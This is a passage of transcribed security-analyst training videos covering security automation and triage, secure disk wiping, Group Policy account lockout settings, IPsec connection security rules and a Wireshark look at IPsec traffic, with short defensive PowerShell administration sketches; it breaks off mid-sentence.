Upon completion of this video, you will be able to recall how automation can simplify and expedite security
tasks.
Objectives
Responding to security incidents in a timely manner, to minimize their negative impact when they occur, is achieved through centralized monitoring tools and automation. So when we identify security automation candidates, we have to think about those IT security tasks that are repeatable and can be automated. So we need to
look at any patterns that might have occurred in the past, in other words, tasks executed by IT security
personnel, that can be automated.
Automation candidates could include those related to the detection of phishing scams. This could be a
technical solution that uses heuristics, as opposed to standard malware signatures, to look for suspicious
behavior or to look for abnormal e-mail domains within mail messages. Then there is malware remediation –
what is normally done to deal with malware outbreaks. It could be isolation of a device to remove it from the
network. But at the same time, it might also be to reboot the machine in another mode to ensure the proper
removal of the malware.
And you have to ask yourself, how much of that can we actually automate? And it doesn't have to be
completely automatable from beginning to end. Even if a portion of it can be automated, there can still be a
benefit realized because we are containing the incident more quickly. There's historical correlation. Often
centralized security monitoring tools such as SIEM tools have the ability to be configured to correlate events.
This means looking at an event and how it might be related to something that happened previously.
For example, if we had a new Linux host show up on the network two days ago and today we have excessive
network spikes stemming from that host, correlation could state that that's suspicious. All of a sudden, we have
this host on the network now. There's a lot of traffic coming from that host. That might not be considered
normal. Now I say "might" because there is a lot of customized configuration required to tweak this for a
specific environment. Because what's abnormal in one environment might be perfectly normal in another.
Another automation candidate would be how alerts are sent out, whether it's e-mail notifications, SMS text
messages, even automating the response with an intrusion prevention system, to perhaps stop an attack in its
tracks. An example of that might be using black holing. So if we detect that we have a distributed denial-of-
service attack that might be beginning, we might route the traffic that we think is suspicious and part of the DDoS attack to nothing. In other words, it doesn't get to the intended network or host and therefore cannot flood it. So alerting and escalation are also potential security automation candidates.
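As a rough illustration of an automated response on a Windows host, the sketch below uses a built-in firewall cmdlet to drop traffic from a suspect address range. True black holing would normally be configured upstream on routers, and the address range used here is only a documentation example.

# Sketch: automatically block inbound traffic from a suspect range.
# 203.0.113.0/24 is a documentation-only (RFC 5737) example range.
$suspectRange = "203.0.113.0/24"
New-NetFirewallRule -DisplayName "Auto-block suspected DDoS source" `
    -Direction Inbound `
    -RemoteAddress $suspectRange `
    -Action Block `
    -Profile Any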
It's important when we talk about security automation that we distinguish the difference between automation
and orchestration because they are not the same thing. So first of all, automation means that we are removing
human input and we can use solutions, especially in the cloud, like machine learning. Machine learning can
use algorithms and, based on ingested data, can start to learn how to make decisions. Of course, that can be
tweaked and controlled by IT security personnel.
There are a lot of CLI tools that can be used to start to automate certain actions related to security, like
malware remediation or dealing with things like the application of updates. So therefore, scripts can be written
using PowerShell cmdlets. Or it could be done in a Unix or Linux environment by writing a BASH shell script.
And we can also automate some tasks using templates. Templates essentially are blueprints or sets of
instructions on how to do something, such as how to deal with some kind of a security incident that has been
raised.
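To make that concrete, here is a minimal, hypothetical sketch of the kind of repeatable containment task that could be scripted with PowerShell cmdlets: take a suspect host off the network and start an antimalware scan. The choice of adapters and scan type are assumptions that would vary per environment.

# Sketch: isolate this host and start a Microsoft Defender scan.
# Disable every connected network adapter to contain the machine.
Get-NetAdapter | Where-Object Status -eq 'Up' |
    Disable-NetAdapter -Confirm:$false

# Then run a full antimalware scan (Defender cmdlet).
Start-MpScan -ScanType FullScan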
Now orchestration is a little bit different because it's designed to combine multiple automation tasks that are
related into a workflow. Now some or all of it can be automated. It might require some user input in some
cases. And when we look at these two things together, security automation and orchestration, what comes to
mind is Security Content Automation Protocol, otherwise called SCAP. The purpose of SCAP is to use
standards, security standards, to automate vulnerability management. Now that's a general statement. Exactly
how that is done will depend on the solution selected.
An example of this might be if you're using Microsoft System Center Configuration Manager, or SCCM, you
might configure security baselines with autoremediation. So for example, if a vulnerable registry entry is
detected on hosts, the autoremediation would change the value of that registry setting.
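The detect-and-remediate pattern itself is simple enough to sketch in PowerShell. The registry key, value name, and desired data below are placeholders rather than an actual SCCM baseline, but they show the shape of an autoremediation check.

# Sketch: check a registry value and set it back if it has drifted.
$key     = 'HKLM:\SOFTWARE\ExampleBaseline'   # placeholder key
$name    = 'ExampleSetting'                   # placeholder value name
$desired = 1                                  # placeholder compliant value

if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
$current = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name
if ($current -ne $desired) {
    # Autoremediation: restore the compliant value.
    Set-ItemProperty -Path $key -Name $name -Value $desired
}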
The other thing to think about is that with automation and orchestration where is the data coming from? So the
data ingestion could stem from a multitude of sources. It could be coming from logs on endpoint perimeter
devices like firewall router devices. We could have server logs, application logs, all being fed to a central
location. And that's important for this to work properly. The notion of playbooks comes in. A playbook is a
collection of instructions that should be undertaken when a specific incident occurs, and it can be either
partially or completely automated. So human intervention might still play a part. It depends on the nature of
the playbook.
The other thing to think about is with security automation and orchestration, the end result is reduced incident
response time, reduced time it would take to contain a problem like malware, and also even some automated
remediation, thus freeing up security analysts to focus their time on other items. We should also think about security API integration. At the software development level, developers can call upon trusted libraries and functions so that they can adhere to secure coding practices.
[Video description begins] Slide title: Security Triage Automation. [Video description ends] Security triage is
all about initial incident response assessment that determines if we've got a false positive, meaning we've got
an alert that was raised but there is no security incident, or if there really is something happening and it
requires further action. So the first responders to an incident deal with security triage to perform a basic
assessment.
Now the primary benefit of security triage automation is to reduce alert fatigue. IT security technicians are
probably already overworked and receiving numerous alerts, many of which could be false positives – alerting of a security incident when there really is none. There needs to be a way to weed out the false positives
and to automate this.
In the end, it helps improve response time for the real incidents that do occur and it allows us to prioritize
incidents. Again, that can be automated as well based on some configuration criteria. And there can also be the
automated task workflow assignment. So when a security incident is detected as being valid, there can be an
automated system that starts sending out notifications and alerts so that tasks can begin in dealing with the
security incident.
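As a purely hypothetical illustration of triage automation, the sketch below scores a couple of made-up alerts and only passes along the ones worth escalating; the alert fields and the scoring rule are invented for the example.

# Sketch: score alerts and weed out likely false positives.
$alerts = @(
    [pscustomobject]@{ Source = 'IDS';  Severity = 'Low';  KnownHost = $true  },
    [pscustomobject]@{ Source = 'SIEM'; Severity = 'High'; KnownHost = $false }
)

$triaged = $alerts | ForEach-Object {
    # Simple rule: high severity or an unknown host gets escalated.
    $escalate = ($_.Severity -eq 'High') -or (-not $_.KnownHost)
    $_ | Add-Member -NotePropertyName Escalate -NotePropertyValue $escalate -PassThru
}

# Only escalated alerts would move on to notification and task assignment.
$triaged | Where-Object Escalate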
In this video, learn how to delete a disk partition using a tool that wipes the disk multiple times.
Objectives
[Video description begins] Topic title: Secure Disposal. Your host for this session is Dan Lachance. [Video
description ends]
Secure disposal of storage media means following the appropriate practices to ensure that data is permanently
deleted and data artifacts cannot be recovered. This is also true in the cloud. One of the considerations when looking at cloud service providers is, what practices are put in place to safely remove data when it's no longer
needed?
So here on Windows Server 2019, I'm going to install a tool called HDScrub34. [Video description begins] An
HDScrub34 application is available in the "This PC" category of a HardDiskScrubber_34 window. [Video
description ends] There are plenty of tools out there that will do this. [Video description begins] When the
presenter double-clicks the application, a "Setup - Hard Disk Scrubber" wizard appears. It includes a "Next"
button. [Video description ends]
I'm essentially going to accept the defaults for this installation. And after which, we will run the tool to wipe
out a disk partition. So I'm going to launch the Hard Disk Scrubber tool. [Video description begins] He points
to a "Launch Hard Disk Scrubber" checkbox, which is selected. [Video description ends]
I'll click Finish. [Video description begins] A Disk Scrubber v3.4 dialog box appears. It includes two sections:
Hard Disk Free Space Scrubbing and Scrub (Overwrite) Type. The "Hard Disk Free Space Scrubbing" section
includes a "Drive to Scrub:" drop-down list, which is set to C: (Local Disk); a "Priority:" drop-down list,
which is set to Normal; and an associated "Scrub Drive" button. The "Scrub (Overwrite) Type" section
includes the following option: "Ultra (9-Stage, DoD recommended spec w/Vfy)". [Video description ends]
What I want to do is scrub out drive D on this host. Naturally, you want to be very careful with this tool to
make sure that there's nothing on that drive you don't already have a copy of, if you need a copy of it. [Video
description begins] He selects the "D: (New Volume)" option from the "Drive to Scrub:" drop-down
list. [Video description ends]
So if we're going to decommission a storage area, in this case drive D on this host, then we could scrub it. Now
that means multiple write passes. I could select drive D. And down below, I could choose, for example, the Ultra overwrite or scrubbing type. It's a 9-stage specification recommended by the United States Department of Defense, with verification. So we're talking about multiple passes of overwriting everything on the disk to
ensure that nothing can be recovered.
So once we've got that done, we can specify that we want to scrub the drive. So I'm going to go ahead and
click Scrub Drive. And we can see at this point, it's begun the process. So it's starting to do pass number 1 of 9
where all zeros are being written through every storage area on the disk. [Video description begins] He points
to a progress bar that displays at the top of the Disk Scrubber v3.4 dialog box. [Video description ends] This
means that if this storage device fell into unauthorized hands, the chances of somebody being able to recover
the contents of it are slim to none.
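As a side note, Windows also ships with a built-in way to overwrite free space from a script: cipher.exe with the /w switch writes a pass of zeros, a pass of ones, and a pass of random data across the free space of a volume. It isn't the same as the multi-pass, whole-partition wipe shown above, but it illustrates the same idea of overwriting rather than simply deleting.

# Overwrite the free space on drive D: (three passes: zeros, ones, random).
cipher /w:D:\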
[Video description begins] Topic title: Enable Password Lockout Settings. Your host for this session is Dan
Lachance. [Video description ends]
If your organization uses Microsoft Windows, then you might be interested in using Group Policy to configure
security settings such as those that might be related to enabling password lockout settings. Here on my
Windows Server 2019 server, which is also an Active Directory domain controller, I'm going to go into the
Start menu, and down under Windows Administrative Tools, I'm going to scroll down until I see in the Gs the
Group Policy Management tool. Group Policy can be configured centrally in Active Directory.
[Video description begins] The presenter selects the "Group Policy Management" category, and the
corresponding console opens. It includes a toolbar and contains a single category, Group Policy
Management, in the navigation pane. The category has a single node, Forest Domain1.Local. [Video
description ends]
And any computers that are joined to the Active Directory domain could be affected by it. I say "could" – it
depends how you configure the scope of the Group Policy Object. So here on the left, I'm going to expand the
name of my forest and domains. There's my domain. It's called Domain1.Local. I'll expand that. And under
that, I see the Default Domain Policy. That's a GPO. That is a Group Policy Object that contains potentially
thousands of settings that would apply to every user and computer in the domain or a subset, again depending
on how we configure the scope.
[Video description begins] The expanded "Forest Domain 1.Local" node includes a "Domains" node. He
expands the "Domains" node to reveal a "Domain1.Local" node. Next, he expands the "Domain1.Local" node
to reveal a "Default Domain Policy" file and a few nodes. [Video description ends]
So by default, any settings I put in the Default Domain Policy will flow down to all users and computers joined
to the domain unless otherwise specified. So I'm going to go ahead and right-click on the Default Domain
Policy and choose Edit. [Video description begins] A "Group Policy Management Editor" application opens.
It has a "Default Domain Policy" category in the navigation pane. The category contains two nodes:
Computer Configuration and User Configuration. The "Computer Configuration" node, which is expanded,
contains two nodes: Policies and Preferences. [Video description ends]
Now there are thousands of settings that can be configured in Group Policy. So from a security perspective,
this is a good thing if you have a lot of computers joined to the domain. It's a centralized way to configure
security settings that will impact many machines at once. So we're going to take a look at how to configure
password lockout settings.
So under Computer Configuration on the left, I'm going to go down under Policies, I'm going to go down
under Windows Settings. Once that expands, I'm going to go down under Security Settings. Then I'll go down
under Account Policies. And then we have a number of items that we can configure, one of which is the
Account Lockout Policy.
[Video description begins] He double-clicks the "Account Lockout Policy" node and a table with the following
columns displays: Policy and Policy Setting. The following policies appear in the table: Account lockout
duration with Policy Setting listed as Not Defined, Account lockout threshold with Policy Setting listed as 0
invalid logon attempts, and Reset account lockout counter after with Policy Setting listed as Not
Defined. [Video description ends]
Now here, we can specify the account lockout threshold. So if I were to put this to a value of 3, it means after
three invalid logon attempts, that user account will be locked out. We also get to specify some other settings. When I click OK, a prompt says that some related settings will be turned on with suggested values. And we can configure them other than their defaults.
[Video description begins] He double-clicks the "Account lockout threshold" policy, and an "Account lockout
threshold Properties" dialog box appears. It contains two tabs: Security Policy Setting and Explain. The
"Security Policy Setting" tab, which is selected, includes the following spin box: Account will not lock out.
(given as 0 invalid logon attempts). After setting the spin box to 3, when he clicks the "OK" button, a
"Suggested Value Changes" prompt appears. He clicks the "OK" button, closes the "Account lockout threshold
Properties" dialog box, and returns to the "Group Policy Management Editor" application. In the table that
displays in the "Account Lockout Policy" node, the "Account lockout duration" policy now appears with Policy
Setting listed as 30 minutes, the "Account lockout threshold" policy appears with Policy Setting listed as 3
invalid logon attempts, and the "Reset account lockout counter after" policy appears with Policy Setting listed
as 30 minutes. [Video description ends]
So how long should the account be locked after three invalid login attempts? The default value is 30 minutes,
but we could change that. [Video description begins] He double-clicks the '"Account lockout duration" policy
to open the corresponding properties dialog box. It includes a spin box: "Account is locked out for:" (given as
30 minutes). After pointing to the spin box, he closes the dialog box. [Video description ends]
Also, how long until we reset the account lockout counter? That is, how long the count of invalid logon attempts against the account is retained. Normally, that's set to the same value as the actual lockout duration. So that's 30 minutes. Now what does this solve? [Video description begins] He double-clicks the "Reset account lockout
counter after" policy to open the corresponding properties dialog box. It includes a spin box: Reset account
lockout counter after (given as 30 minutes). After pointing to the spin box, he closes the dialog box. [Video
description ends]
Well, what it will solve is brute force password attempts where a malicious user might use an automated tool
to try numerous username and password combinations against the account until one works and they get in. So
by doing this, after the first three attempts, the account is locked out for 30 minutes. Now that's good from a
perspective of mitigating brute force attacks.
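For reference, the same lockout values could also be applied from PowerShell rather than through the Group Policy editor. This is a sketch that assumes the ActiveDirectory module is available and uses the demo domain name; it sets the domain's default password policy, which roughly corresponds to the settings configured above.

# Sketch: set the domain lockout policy with the ActiveDirectory module.
Set-ADDefaultDomainPasswordPolicy -Identity Domain1.Local `
    -LockoutThreshold 3 `
    -LockoutDuration (New-TimeSpan -Minutes 30) `
    -LockoutObservationWindow (New-TimeSpan -Minutes 30)

# Verify the values now in effect.
Get-ADDefaultDomainPasswordPolicy -Identity Domain1.Local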
But what about the poor user who can't log in anymore? Well, they would have to contact the help desk in
some way to get the account unlocked after they prove their identity in some way, in accordance with
organizational security policies. Now bear in mind, that's all we need to do for this to apply to every computer
in the domain by default – even computers in organizational units, or OUs, under the domain. [Video
description begins] After closing the "Group Policy Management Editor" application, he returns to the "Group
Policy Management" console and points to the nodes in the "Domain1.Local" node. [Video description ends]
And bear in mind that it will take some time before Group Policy refreshes on computers. So for computers
that are joined to the domain and online right now, it could take up to an hour, an hour and a half, before
Group Policy refreshes and this change is put into effect. Now the only concern here is, wait a minute, what
about administrative accounts? If all computers in the domain will put this into effect, then that might be a
problem.
Well, what we could do is exclude administrative accounts. So for example, let's go to Windows
Administrative Tools in the Start menu. Let's open up Active Directory Users and Computers. So let's say that
we've got administrators that use specific computers joined to the domain.
[Video description begins] The "Active Directory Users and Computers" tool that opens includes a toolbar
and has the following nodes in the navigation pane: Saved Queries and Domain1.Local. The "Domain1.Local"
node, which is expanded, includes two nodes: Computers and Users. And when he selects the "Computers"
node, the corresponding view has a table with the following columns: Name, Type, and Description. A single
computer name appears in the table. [Video description ends]
So what I'm going to do then under my domain is build a new organizational unit called Admins. I'll click
OK. [Video description begins] He selects the "Domain1.Local" node and clicks the "New Object" icon in the
toolbar. A "New Object - Organizational Unit" dialog box appears. It includes a "Name:" field. And when he
types "Admins" in the "Name:" field and clicks the "OK" button, an "Admins" folder displays in the
"Domain1.Local" node. [Video description ends]
Now what I would normally do is move computers to that location. Of course, that means that they might get
different Group Policy settings associated with them. And that's true. [Video description begins] He selects the
"Computers" node and drags the record that displays in the corresponding table to the "Admins" folder. And
when he double-clicks the folder, the corresponding view now contains the record. [Video description ends]
You could also move user accounts to that location if you so choose. So I can move users and computers that
admins use to the Admins OU. Now you don't have to do this, but it's an option. [Video description
begins] When he selects the "Users" node, the corresponding view has a table with the following columns:
Name, Type, and Description. Several users, including "Administrator," are listed in the table. He then drags
the "Administrator" record to the "Admins" folder. And when he selects the folder, the corresponding view
also displays the "Administrator" record. [Video description ends]
Now what purpose does that serve? Well, none unto itself. Let's go back into Group Policy. Because what we
could then do, let's refresh this list here because now we can see the Admins OU. I could right-click on the OU
and I could block inheritance. [Video description begins] After returning to the "Group Policy Management"
console, when he clicks the refresh icon in the toolbar, an "Admins" node also now displays in the
"Domain1.Local" node. He then opens the corresponding context menu and clicks Block Inheritance. [Video
description ends]
So we get that little blue symbol with the white exclamation mark. [Video description begins] He points to the
"Admins" folder. [Video description ends] That means that any GPOs, any group policies from above like the
default domain policy where the settings would normally flow into OUs, because I've blocked inheritance on
that one, they will not.
So therefore, the password account lockout settings will not apply to admins, at least those admins that have
computers within the Admins OU. So there are a few things that we should consider when it comes to enabling
security settings like account lockout and its potential impact on administrative accounts.
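The OU and inheritance steps could likewise be scripted. The sketch below assumes the ActiveDirectory and GroupPolicy PowerShell modules and uses the demo domain's distinguished name; the computer name is a made-up example.

# Sketch: create the Admins OU and block GPO inheritance on it.
New-ADOrganizationalUnit -Name "Admins" -Path "DC=Domain1,DC=Local"
Set-GPInheritance -Target "OU=Admins,DC=Domain1,DC=Local" -IsBlocked Yes

# Optionally move a computer an admin uses into the new OU (example name).
Get-ADComputer -Identity "ADMIN-PC1" |
    Move-ADObject -TargetPath "OU=Admins,DC=Domain1,DC=Local"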
[Video description begins] Topic title: IPsec. Your host for this session is Dan Lachance. [Video description
ends]
IPsec stands for IP Security, Internet Protocol Security. It's all about securing network transmissions in a
variety of different ways. But the great thing about IPsec is it's not application specific. What does that mean?
Well, think about securing a website. So instead of HTTP, you want connectivity over HTTPS, where the S
stands for Secured. So you need a PKI certificate to enable TLS on the web server to make that happen. But if
you've got numerous web servers, then basically you have to go through and make that configuration over and
over and over many times.
IPsec isn't application specific. It's protocol specific. So if you wanted to secure all IP traffic, you could have
that happen on a local area network, for example, with a single configuration. Now there are two main IPsec
modes. And really, your configuration determines which of these is used. There's tunnel mode. Tunnel mode
uses packet encapsulation, basically putting one packet inside of another, sending it off. And on the other end,
it gets revealed. So it gets de-encapsulated. So this is often used for VPN tunneling.
However, IPsec isn't only for VPNs. You can also use it in transport mode. Now there's no packet
encapsulation with transport mode. So we aren't placing one packet inside of another one. And you'll find
transport mode with IPsec is normally used when you want confidentiality, when you want to encrypt packet
payload. And that would be for any type of traffic as long as your configuration doesn't specify otherwise.
IPsec supports Authentication Headers, otherwise called AH, as well as Encapsulating Security Payload, ESP.
Authentication Headers can be used with or without ESP. And it's used to determine the authenticity of the
message. Is it authentic? Was it sent from who it says it was sent from? And has it been tampered with or not?
So choose AH when you need authentication. Whereas ESP can be used with or without Authentication Headers. But unto
itself, it provides confidentiality or encryption for packet payloads.
As you might guess, for the ultimate in security, you might want to configure AH and ESP to work together.
Now when two devices that are configured to use IPsec communicate with one another, they negotiate the terms that they will use to transmit. After that negotiation happens, they are said to have established a security association, or SA, after which IPsec is used to securely transmit data.
Now if you're in a Windows environment, you can actually configure this within Windows Defender Firewall.
You do it through connection security rules. Now you could do it centrally through the Group Policy if you
want to apply this to numerous domain-joined computers in a Microsoft Active Directory environment.
14. Video: Enable IPsec (it_cscysa20_15_enus_14)
In this video, learn how to enable IPsec connection security rules using Microsoft Group Policy.
Objectives
[Video description begins] Topic title: Enable IPsec. Your host for this session is Dan Lachance. [Video
description ends]
IPsec stands for IP Security. This is a standard that allows for the protection of network traffic, whether it's
authentication or whether it's encryption or perhaps both. In a Windows environment, you can enable IPsec on
an individual machine through connection security rules within Windows Defender Firewall. Or you can do it
centrally through Group Policy.
Let's just examine both options quickly. So here on Windows Server 2019, I'm going to go into the Start menu
and I'm going to type in firewall. That will let me pop up Windows Defender Firewall with Advanced Security.
Now of course, Windows Defender Firewall can be used to define inbound and outbound rules to allow or deny traffic as needed.
[Video description begins] The "Windows Defender Firewall with Advanced Security" console has the
following category in the navigation pane: Windows Defender Firewall with Advanced Security. The category
includes the following files: Inbound Rules, Outbound Rules, and Connection Security Rules. It also contains a
"Monitoring" node. [Video description ends]
But it's also got Connection Security Rules. [Video description begins] When the presenter selects the
"Connection Security Rules" file, the corresponding view has an empty table with the following columns:
Name, Enabled, Endpoint 1, etc.. [Video description ends] Here we could right-click and build a connection
security rule to determine how IPsec should behave. [Video description begins] When he right-clicks the
"Connection Security Rules" file and clicks New Rule... from the corresponding context menu, a New
Connection Security Rule Wizard appears. [Video description ends]
Now by doing that on this host, we are only configuring IPsec on this host. However, we can also do it
centrally through Group Policy, which would potentially affect multiple computers joined to the Active
Directory domain. [Video description begins] He closes the wizard and the console. [Video description ends]
So from the Start menu, let's open up the Group Policy Management tool. So I'm going to go down under
Windows Administrative Tools, and in the Gs, sure enough, there's Group Policy Management. Every Active
Directory domain has a Default Domain Policy.
[Video description begins] The "Group Policy Management" console that opens has a "Group Policy
Management" category in the navigation pane. The category has a single node, Forest Domain1.Local, which
is expanded and which includes a "Domains" node. The "Domains" node, which is expanded, contains a
"Domain1.Local" node. The "Domain1.Local" node, which is expanded, includes a "Default Domain Policy"
file and an "Admins" folder. [Video description ends]
That's a Group Policy Object, or GPO, that could potentially contain thousands of settings. Now it's linked or
associated with the domain. So by default, it flows down to all organizational units unless we've got an
organizational unit, or OU, as we do here, that's got Block inheritance turned on – that's what that little blue
symbol is.
So if I right-click, Block Inheritance means what it says – do not allow GPO settings from above to be
inherited into this OU. And in this case it's for admins. [Video description begins] After pointing to the
"Admins" folder, when he opens the corresponding context menu, Block Inheritance is one of the commands
that displays in it. [Video description ends]
So let's go ahead and right-click on the Default Domain Policy and choose Edit, so we can talk about where to
go to configure IPsec connection security rules. [Video description begins] The "Group Policy Management
Editor" application that opens has the following category in the navigation pane: Default Domain Policy. The
category contains two expanded nodes: Computer Configuration and User Configuration. The "Computer
Configuration" node contains two nodes: Policies and Preferences. [Video description ends]
That's going to be under Computer Configuration. You have to expand Policies and go to Windows Settings.
And under there, you then go into Security Settings. This is where the vast majority of Windows security
settings are configured in Group Policy. It's at the computer level as opposed to the user level, so the computer
that is joined to the Active Directory domain. [Video description begins] The expanded "Security Settings"
node includes a "Windows Defender Firewall with Advanced Security" node. [Video description ends]
So I'm going to go down under Windows Defender Firewall with Advanced Security. I'll just keep drilling
down under there. So we can see we can specify inbound and outbound rules just like we could on an
individual host. But we can also configure Connection Security Rules. So the difference here is, well, at least
by default, these rules will apply to all computers in the domain. Of course, except where Block inheritance
has been turned on for OUs.
[Video description begins] The expanded "Windows Defender Firewall with Advanced Security" node contains
another "Windows Defender Firewall with Advanced Security" node. He expands the node to reveal three
files: Inbound Rules, Outbound Rules, and Connection Security Rules. He selects the "Connection Security
Rules" file, and the corresponding view contains an empty table with the following columns: Name, Enabled,
Endpoint 1, etc.. [Video description ends]
So I'm going to go ahead and right-click on Connection Security Rules and choose New Rule.... [Video
description begins] A New Connection Security Rule Wizard appears. It has the following steps in the
navigation pane: Rule Type, Requirements, Authentication Method, Profile, and Name. Currently, Rule Type is
selected. It contains the following options: Isolation, Authentication exemption, Server-to-server, etc..
Currently, Isolation is selected. [Video description ends]
Your requirements will determine which type of connection security rule you select here. For example, here
I'm going to choose Server-to-server. I want to authenticate connections between specified computers. So I'll
select that. I'll click Next. [Video description begins] The "Endpoints" step, which is now selected, has two
sections: Which computers are in Endpoint 1? and Which computers are in Endpoint 2?. Each of these
sections includes an "Any IP address" option. [Video description ends]
It asks if I want to specify IP addresses on each end of the connection. So we can specify specific IPs that this rule would apply to – so they would get these settings, in other words. I'm going to leave that at Any IP
address. [Video description begins] He clicks the "Next" button, and the "Requirements" step is selected. It
contains three options: Request authentication for inbound and outbound connections, Require authentication
for inbound connections and request authentication for outbound connections, and Require authentication for
inbound and outbound connections. [Video description ends]
Then we have the option – how do we want IPsec to be negotiated? Do we want to request it for inbound and
outbound connections or require it for inbound connections but request authentication for outbound or require
for inbound and outbound? Now requiring it for both inbound and outbound connections means that the hosts affected by this Group Policy Object and these connection security rules will only talk to other machines configured similarly.
Now in a highly secured environment, that might make sense. But if the machine, for example, needs to
connect to an Internet host, that could be a problem if that Internet host is not configured with the same IPsec
connection security rules. So I'm going to choose request for inbound and outbound. So if a machine that is
communicating with a server affected by this doesn't support IPsec, communication will still take place after
checking to see if IPsec could be used.
So I'm going to go ahead and click Next. [Video description begins] The "Authentication Method" step, which
is selected, contains two options: Computer certificate and Advanced. The "Computer certificate" option is
currently selected. The "Advanced" option has an associated "Customize..." button, which is currently
unavailable. [Video description ends]
We can use a computer certificate to authenticate machines to one another. But I can also click Advanced and
choose Customize.
[Video description begins] When he selects the "Advanced" option and clicks the "Customize..." button, a
"Customize Advanced Authentication Methods" dialog box appears. It contains two sections: First
authentication and Second authentication. The "First authentication" section includes an empty "First
authentication methods:" table with the following columns: Method and Additional Information. The table has
three associated buttons: Add..., Edit..., and Remove. The "Second authentication" section has a similar
"Second authentication methods:" table. [Video description ends]
And I've got two authentication methods I could select from where if the first one fails, the second one kicks
in. So if I click Add..., it can be Computer (Kerberos V5). [Video description begins] When he clicks the
"Add..." button associated with the "First authentication methods:" table, an "Add First Authentication
Method" dialog box appears. It contains the following options: Computer (Kerberos V5), Computer
(NTLMv2), Computer certificate from this certification authority (CA):, and "Preshared key (not
recommended):. Currently, Computer (Kerberos V5) is selected. [Video description ends]
Now that's the Active Directory authentication protocol. So for domain-joined computers, that's a good choice.
There already is an implied level of trust by virtue of those hosts being joined to Active Directory. You could
choose the older NTLMv2 (NT LAN Manager version 2) protocol or a PKI certificate. Or you could use the least secure option,
a preshared key, where you would put in the same item on both ends of a connection to allow them to
communicate.
But because in this case, I only want this applicable to domain-joined computers, it just makes sense to use
Computer (Kerberos V5). So I'm going to click OK and OK. [Video description begins] He returns to the New
Connection Security Rule Wizard. [Video description ends] And I'm just going to continue specifying which
network location profile that this applies to. [Video description begins] He clicks the "Next" button, and the
"Profile" step is now selected. It contains three selected checkboxes: Domain, Private, and Public. [Video
description ends]
I'm going to leave it selected for all, so whether we're joined to an Active Directory domain network, for a
private network, or public. And in the case of a server, servers don't get carried around and moved – at least
ideally they wouldn't be. So that probably isn't an issue when it comes to private and public networks. So I'm
going to click Next. [Video description begins] The "Name" step, which is now selected, has a "Name:" field
and a "Description (optional):" section. [Video description ends]
This is going to be called Request IPSec – so Request IPSec. And then I'll click Finish. Now at this point,
we've got that configured. Let's just switch back to that detailed screen. We've now got Request IPSec, which
is now enabled in Group Policy. [Video description begins] He returns to the "Group Policy Management
Editor" application. The "Request IPSec" rule now appears in the table in the "Connection Security Rules"
option. [Video description ends]
Now remember, Group Policy has to refresh before we can expect to see this change on machines joined to the domain. So if I were to go back into Windows Defender Firewall and look at Connection Security Rules, I
don't see it there. But if I were to refresh Group Policy, so let's go to a Command Prompt. [Video description
begins] He types cmd in the Search box associated with the Start menu, and the corresponding application
opens. [Video description ends]
Let's run gpupdate /force to force a Group Policy update manually, just to test it. You wouldn't want to run to
every computer on the network and do this, nor would you want to remote into them. It'll just happen automatically. Normally, the refresh interval is between 60 and 90 minutes.
Now that Group Policy has refreshed, if we check Windows Defender Firewall on this individual host, we'll
see the Request IPSec connection security rule. [Video description begins] He returns to the "Windows
Defender Firewall with Advanced Security" console. The Request IPSec rule now appears in the table in the
"Connection Security Rules" file. [Video description ends]
And when a session has actually been established between two hosts that support IPsec, you would see it under
Monitoring. For example, you would be able to see that there is a security association or an SA between hosts
that support IPsec. [Video description begins] He expands the "Monitoring" node. It includes a "Security
Associations" node, which he expands to reveal two folders: Main Mode and Quick Mode. And when he clicks
the "Quick Mode" folder, the corresponding view includes an empty table with the following columns: Local
Address, Remote Address, Local Port, etc. [Video description ends]
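To check those security associations from the command line instead of the console, something along these lines should work; this is a hedged sketch using the built-in netsh tool:

netsh advfirewall monitor show mmsa
netsh advfirewall monitor show qmsa

These show main mode and quick mode security associations, respectively, and they will be empty until IPsec-protected traffic has actually been negotiated between two hosts.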
In this video, you will learn how to capture and analyze IPsec network traffic.
Objectives
[Video description begins] Topic title: IPsec Traffic Analysis. Your host for this session is Dan
Lachance. [Video description ends]
IPsec, or IP Security, is a protocol suite that's used to secure network transmissions. In particular, in this demonstration, we're going to go through an existing packet capture to try to examine Encapsulating Security Payload, or ESP, transmissions, which result from an IPsec configuration. But first, let's select a standard transmission here. When I say "standard," I mean not encrypted with IPsec.
[Video description begins] A Wireshark window titled IPSec_ESP_Ping.pcap is open. It includes the following
parts: a menu, a main toolbar, a filter toolbar, a packet list pane, a packet details pane, and a packet bytes
pane. The packet list pane contains a table with the following columns: No., Time, Source, Destination,
Protocol, etc. Several packets appear in the table. A packet with Protocol listed as UDP is selected. The
packet details pane contains the following nodes: Frame 710, Ethernet II, Internet Protocol Version 4, User
Datagram Protocol, and Data (12 bytes). The "Ethernet II" node, which is expanded, includes two nodes:
Destination and Source. [Video description ends]
So I can see the source and destination IP addresses. I can see it's using UDP. And having that packet selected
here in Wireshark, if I look at the packet headers in the center of the screen, in the Ethernet II header, I can see
the source and destination MAC addresses. These are the 48-bit hexadecimal addresses at the hardware level
that are used for network interfaces on a local area network.
Now the next header – in this particular case, with this captured packet – is an IP header, Internet Protocol, which consists of many different fields, including the protocol that follows, which is going to be UDP; the Time to Live, or TTL, which is decremented by 1 every time the transmission passes through a router; and of course, the source and destination IP addresses. [Video description begins] The presenter expands the "Internet Protocol Version 4" node. The expanded node includes a "Flags" node and the following headings: Time to live, Protocol, Source, and Destination. [Video description ends]
So this is all Layer 3 stuff in the OSI model. That's what IP, or Internet Protocol, maps to. Then we can see
User Datagram Protocol. We can see the source and destination port numbers. [Video description begins] He
expands the "User Datagram Protocol" node. The expanded node includes a "Source Port" heading and a
"Destination Port" heading; 60832 and 3389, respectively display against these headings. [Video description
ends]
Port 3389 is used for Remote Desktop Protocol, or RDP. The higher-numbered ephemeral port is the client's source port, which the RDP host uses to reply to the client device making the connection. And then, of course, we can see the actual data
here. [Video description begins] He expands the "Data (12 bytes)" node. It includes a "Data" heading. [Video
description ends]
So the point is we know what kind of a transmission this is because we can see everything. We've even got
some ICMP traffic here. Now again, we can see the IP header, we can see the ICMP, or Internet Control
Message Protocol, header. [Video description begins] In the table in the packet list pane, he selects a packet
with Protocol listed as ICMP. The packet details pane now contains the following nodes: Frame 712, Ethernet
II, Internet Protocol Version 4, and Internet Control Message Protocol. [Video description ends]
We can read a lot here. Now let's filter this packet capture for ESP, which stands for Encapsulating
